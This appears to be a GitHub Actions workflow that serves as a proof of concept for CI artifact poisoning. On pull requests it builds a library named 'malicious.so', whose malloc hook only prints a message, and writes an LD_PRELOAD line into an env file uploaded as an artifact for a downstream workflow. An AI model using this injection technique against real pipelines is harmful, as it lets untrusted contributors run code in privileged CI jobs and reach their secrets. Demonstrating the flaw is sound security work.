name: Validate

on:
  pull_request:
  push:
    branches:
      - master

jobs:
  snapshot-tests:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout the code
        uses: actions/checkout@v3
      - name: Create malicious shared library
        run: |
          cat <<EOF > malicious.c
          #define _GNU_SOURCE

          #include <stdio.h>
          #include <dlfcn.h>

          static void* (*real_malloc)(size_t)=NULL;

          void *malloc(size_t size)
          {
              printf("hello from here\n");
              real_malloc = dlsym(RTLD_NEXT, "malloc");
              return real_malloc(size);
          }
          EOF
      - name: Compile
        run: |
          gcc -shared -fPIC -o malicious.so malicious.c
      - name: Save PR number
        if: github.event_name == 'pull_request'
        env:
          PR_NUMBER: ${{ github.event.number }}
        run: |
          mkdir env
          echo PR_NUMBER=$PR_NUMBER > ./env/env
          echo GITHUB_SHA=${{ github.sha }} >> ./env/env
          echo "LD_PRELOAD=./malicious.so" >> ./env/env
      - uses: actions/upload-artifact@v3
        with:
          name: env
          path: env/
